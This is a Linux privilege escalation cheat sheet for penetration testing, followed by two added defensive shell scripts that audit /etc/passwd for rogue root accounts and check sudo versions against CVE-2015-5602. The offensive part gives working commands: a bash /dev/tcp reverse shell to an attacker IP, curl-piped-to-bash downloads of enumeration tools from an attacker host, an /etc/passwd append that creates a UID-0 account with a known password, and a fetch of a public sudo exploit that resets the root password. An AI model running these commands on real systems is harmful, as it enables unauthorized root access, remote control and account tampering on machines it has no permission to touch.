Linux Privilege Escalation

This page is a reference guide to Linux privilege escalation and exploitation techniques, with practical commands, tools, and tips. Use these methods to enumerate, exploit, and escalate privileges on Linux systems during penetration testing.

Shell Handling Techniques

Reverse Shell

  • Attacker's machine (waiting for connection):
nc -nvlp {port}
  • Target's machine (connect to attacker):
bash -i >& /dev/tcp/{ip}/{port} 0>&1
# Example:
bash -i >& /dev/tcp/192.168.119.1/443 0>&1

Fixing PATH Issues

If you get a shell with a limited PATH, restore it with:

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Upgrading to a PTY Shell

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

Or try:

{ which python; } && { python -c 'import pty ; pty.spawn("/bin/bash")'; :; } || { echo "No python"; { which python3; } && { python3 -c 'import pty ; pty.spawn("/bin/bash")'; :; } || { echo "No python3"; } }

Basic System Enumeration

whoami
uname -a

Automated Enumeration Tools

linpeas.sh

wget http://192.168.119.1:8080/f/linpeas.sh -O linpeas.sh
curl http://192.168.119.1:8080/f/linpeas.sh -o linpeas.sh
bash ./linpeas.sh
# Or run directly:
curl http://192.168.119.1:8080/f/linpeas.sh | bash

lse.sh

wget http://192.168.119.1:8080/f/lse.sh -O lse.sh
curl http://192.168.119.1:8080/f/lse.sh -o lse.sh
bash ./lse.sh
# Or run directly:
curl http://192.168.119.1:8080/f/lse.sh | bash

LinEnum.sh

wget http://192.168.119.1:8080/f/LinEnum.sh -O LinEnum.sh
curl http://192.168.119.1:8080/f/LinEnum.sh -o LinEnum.sh
bash ./LinEnum.sh
# Or run directly:
curl http://192.168.119.1:8080/f/LinEnum.sh | bash

pspy

  • pspy GitHub
  • Process monitoring tool for Linux, useful for finding scheduled tasks and privilege escalation vectors.

Check your architecture:

uname -m
# x86_64 (64bit), i686 (32bit)

Download and run:

wget http://192.168.119.1:8080/f/pspy32 -O pspy32
curl http://192.168.119.1:8080/f/pspy32 -o pspy32
chmod +x pspy32
./pspy32

wget http://192.168.119.1:8080/f/pspy64 -O pspy64
curl http://192.168.119.1:8080/f/pspy64 -o pspy64
chmod +x pspy64
./pspy64

SUID Exploitation

/etc/passwd Trick

echo -n "hack:\$1\$hack\$22.CgYt2uMolqeatCk9ih/:0:0:root:/root:/bin/bash" >> /etc/passwd
su hack
# Password: pass123
# (No output, but you can run 'whoami' to check)
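The trick above requires write access to /etc/passwd and leaves two indicators behind: a second account with UID 0, and a password hash stored in the passwd file instead of /etc/shadow. The POSIX sh audit below is an added example, not code from the original page; it flags both indicators. The sample passwd files are constructed inline, and the tampered one is appended with printf and no trailing newline, mirroring the echo -n in the trick, which a plain `while read` loop would silently skip. The function name `audit_passwd_file` and the placeholder hash are this example's own.

```shell
# Added audit example (not from the original page). Flags the two indicators the
# /etc/passwd trick leaves behind: an extra UID-0 account and a password hash
# stored in the passwd file instead of /etc/shadow.
# Run against a real system with: audit_passwd_file /etc/passwd

# Print one finding per line for the given passwd-format file.
# Returns 0 when the file is clean, 1 when at least one finding was printed.
audit_passwd_file() {
    file="$1"
    findings=0
    # '|| [ -n "$name" ]' still processes a final line that lacks a trailing
    # newline, which is exactly what "echo -n ... >> /etc/passwd" produces.
    while IFS=: read -r name pw uid _rest || [ -n "$name" ]; do
        case "$name" in ''|'#'*) continue ;; esac   # skip blank lines and comments
        if [ "$uid" = "0" ] && [ "$name" != "root" ]; then
            echo "UID0: extra superuser account '$name'"
            findings=$((findings + 1))
        fi
        case "$pw" in
            x|'*'|'!'|'!!'|'') ;;   # shadowed or locked: expected values
            *) echo "HASH: account '$name' carries a password hash in the passwd file"
               findings=$((findings + 1)) ;;
        esac
    done < "$file"
    [ "$findings" -eq 0 ]
}

# Constructed sample files (not real system data).
CLEAN_PASSWD=$(mktemp)
cat > "$CLEAN_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
EOF

TAMPERED_PASSWD=$(mktemp)
cp "$CLEAN_PASSWD" "$TAMPERED_PASSWD"
# Append an entry the way the trick does: no trailing newline, UID 0, hash inline.
# The hash below is a placeholder, not a working credential.
printf '%s' 'hack:$6$placeholder$NOTAREALHASH:0:0:root:/root:/bin/bash' >> "$TAMPERED_PASSWD"

echo "clean file:";    audit_passwd_file "$CLEAN_PASSWD"    && echo "  no findings"
echo "tampered file:"; audit_passwd_file "$TAMPERED_PASSWD" || echo "  review required"
```

On a live host, pair this with a file-integrity check (for example an AIDE or auditd watch on /etc/passwd and /etc/shadow) so that the append itself is logged, not only discovered on the next audit run.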

Kernel Exploits

Linux Exploit Suggester 2

  • Tool to suggest kernel exploits based on version.
./linux-exploit-suggester-2.pl -k 4.4.10

Compiling 32bit Exploits

sudo apt install -y gcc-multilib
gcc exploit.c -Wl,--hash-style=both -m32 -o exploit.elf

Dirty COW (Linux 2.6.22 < 3.9)

sudo <= 1.8.14 Exploit (CVE-2015-5602)

wget https://raw.githubusercontent.com/t0kx/privesc-CVE-2015-5602/master/exploit.sh

Example usage:

sudo -l
# Check for NOPASSWD sudoedit permissions
./exploit.sh
# If successful, root password will be changed
su
# Password: (see exploit output)
id
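The page states that this exploit applies to sudo <= 1.8.14. When auditing a fleet for that bound, the pitfall is comparing version strings lexically, where "1.8.9" sorts after "1.8.14". The POSIX sh check below is an added example, not code from the original page or the exploit author: it parses the first line of `sudo -V` output and compares the version numerically, treating a sudo-style `p` patch suffix (1.8.14p3) as an extra component. The function names and the sample `sudo -V` output are this example's own.

```shell
# Added patch-level audit example (not from the original page). Compares an
# installed sudo version against the <= 1.8.14 bound stated on the page,
# numerically, so that 1.8.9 < 1.8.14 and 1.8.14p3 > 1.8.14.

# version_le A B: return 0 if dotted version A <= B. Any non-numeric character
# (e.g. the "p" in 1.8.14p3) is treated as a component separator.
version_le() {
    v1=$(printf '%s.' "$1" | sed 's/[^0-9.]/./g')
    v2=$(printf '%s.' "$2" | sed 's/[^0-9.]/./g')
    i=1
    while :; do
        a=$(printf '%s\n' "$v1" | cut -s -d. -f"$i")
        b=$(printf '%s\n' "$v2" | cut -s -d. -f"$i")
        if [ -z "$a" ] && [ -z "$b" ]; then return 0; fi   # all components equal
        a=${a:-0}; b=${b:-0}                                # missing component counts as 0
        if [ "$a" -lt "$b" ]; then return 0; fi
        if [ "$a" -gt "$b" ]; then return 1; fi
        i=$((i + 1))
    done
}

# Extract the version from the first line of `sudo -V` output ("Sudo version 1.8.31").
sudo_version_from_output() {
    printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p' | head -n 1
}

# Return 0 when the given sudo version is within the range the page states (<= 1.8.14).
sudo_within_cve_2015_5602_range() {
    version_le "$1" "1.8.14"
}

# Constructed sample output, not captured from a real host.
SAMPLE_SUDO_V='Sudo version 1.8.9p5
Configure options: --prefix=/usr'
v=$(sudo_version_from_output "$SAMPLE_SUDO_V")
if sudo_within_cve_2015_5602_range "$v"; then
    echo "sudo $v: within the stated range; update sudo and review sudoedit rules in sudoers"
else
    echo "sudo $v: newer than 1.8.14"
fi
```

Usage on a host: `sudo_within_cve_2015_5602_range "$(sudo_version_from_output "$(sudo -V)")"`. The version bound alone does not establish exposure; the page's own precondition (a NOPASSWD sudoedit rule from `sudo -l`) must also hold, so treat the version check as a triage filter that decides which hosts get the sudoers review.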

Further Reading & References